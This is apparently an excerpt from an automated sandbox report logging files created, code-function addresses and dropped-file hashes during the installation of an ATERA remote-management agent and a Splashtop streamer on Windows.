                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c50a.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC672.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC961.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDCAB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDEDF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDEEF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF3E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0C6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c50c.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c50c.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4AD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c50d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F94.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9FF2.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B7C5EA94-B96A-41F5-BE95-25D78B486678}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA0BF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5CE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA15.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c510.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c510.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF78C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB85.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12F6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI172D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c512.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3352.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C2D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c515.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c515.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6457.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c516.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65BF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E91F8AC1-4917-455E-AACA-B40B193C7A62}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI663D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c519.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c519.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6738.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51a.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6833.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6892.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B72.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\system32\SRCEF21.tmp
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\system32\SRCEF21.tmp
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC672.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06E300404_3_06E30040
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_072F59A85_3_072F59A8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_072F50B85_3_072F50B8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_072F4D685_3_072F4D68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B60C92212_2_00007FFD9B60C922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B60BB7612_2_00007FFD9B60BB76
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 12_2_00007FFD9B600C1D12_2_00007FFD9B600C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B641BEE13_2_00007FFD9B641BEE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B63C9BD13_2_00007FFD9B63C9BD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B64387013_2_00007FFD9B643870
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B63C91013_2_00007FFD9B63C910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B647F1013_2_00007FFD9B647F10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B631CE013_2_00007FFD9B631CE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B629AF213_2_00007FFD9B629AF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B63900E13_2_00007FFD9B63900E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B63CF5813_2_00007FFD9B63CF58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B83E2FA13_2_00007FFD9B83E2FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B83AC9713_2_00007FFD9B83AC97
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B83695013_2_00007FFD9B836950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B840FF213_2_00007FFD9B840FF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B83904C13_2_00007FFD9B83904C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFD9B620C5813_2_00007FFD9B620C58
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_06AC75C816_3_06AC75C8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_3_06AC004016_3_06AC0040
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B63FA9420_2_00007FFD9B63FA94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B6378D620_2_00007FFD9B6378D6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B64108C20_2_00007FFD9B64108C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B63182820_2_00007FFD9B631828
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B63868220_2_00007FFD9B638682
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B65047D20_2_00007FFD9B65047D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B6312FB20_2_00007FFD9B6312FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B6410C020_2_00007FFD9B6410C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B63BDB020_2_00007FFD9B63BDB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFD9B6212FA22_2_00007FFD9B6212FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B621D8B24_2_00007FFD9B621D8B
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B833BAD24_2_00007FFD9B833BAD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B829E9D24_2_00007FFD9B829E9D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B82695024_2_00007FFD9B826950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B82AFFA24_2_00007FFD9B82AFFA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B833BAD24_2_00007FFD9B833BAD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 24_2_00007FFD9B82945524_2_00007FFD9B829455
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 27_2_00007FFD9B63895627_2_00007FFD9B638956
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 27_2_00007FFD9B6312FB27_2_00007FFD9B6312FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 27_2_00007FFD9B6566B027_2_00007FFD9B6566B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 27_2_00007FFD9B63970227_2_00007FFD9B639702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6352FA33_2_00007FFD9B6352FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6419B033_2_00007FFD9B6419B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6315FD33_2_00007FFD9B6315FD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B63847633_2_00007FFD9B638476
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6213F233_2_00007FFD9B6213F2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B641AA833_2_00007FFD9B641AA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B641A8033_2_00007FFD9B641A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B641A7833_2_00007FFD9B641A78
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6212DF33_2_00007FFD9B6212DF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B63F1D333_2_00007FFD9B63F1D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6211F233_2_00007FFD9B6211F2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B62108033_2_00007FFD9B621080
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B63F12033_2_00007FFD9B63F120
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B62083833_2_00007FFD9B620838
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B620ED333_2_00007FFD9B620ED3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B6206D333_2_00007FFD9B6206D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B62074033_2_00007FFD9B620740
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041703C36_2_0041703C
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041B37936_2_0041B379
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041D31E36_2_0041D31E
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041638736_2_00416387
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041745C36_2_0041745C
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041043B36_2_0041043B
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004254EF36_2_004254EF
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0042666F36_2_0042666F
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041685C36_2_0041685C
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00425A3336_2_00425A33
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00427C4236_2_00427C42
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00416C3036_2_00416C30
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00425F7736_2_00425F77
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC76D637_2_00BC76D6
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BB286C37_2_00BB286C
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BCE12037_2_00BCE120
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BDF95537_2_00BDF955
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BCC14337_2_00BCC143
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD9E6237_2_00BD9E62
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BB25B537_2_00BB25B5
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD2D0537_2_00BD2D05
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD9E6237_2_00BD9E62
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279D1AD040_2_00007FF6279D1AD0
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DFCE440_2_00007FF6279DFCE4
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DF11C40_2_00007FF6279DF11C
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DCC6440_2_00007FF6279DCC64
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279E42FC40_2_00007FF6279E42FC
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DD30840_2_00007FF6279DD308
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279D423040_2_00007FF6279D4230
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279D4E1040_2_00007FF6279D4E10
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll 443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BC10D0 appears 82 times
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BB91B6 appears 66 times
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BB3DCE appears 62 times
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: String function: 00416118 appears 53 times
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: String function: 00415D1C appears 66 times
                                Source: System.Net.NameResolution.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.IO.Compression.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Collections.Specialized.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.InteropServices.RuntimeInformation.dll.1.drStatic PE information: No import functions for PE file found
                                Source: Microsoft.Win32.Registry.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.ComponentModel.EventBasedAsync.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Linq.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.CompilerServices.VisualC.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
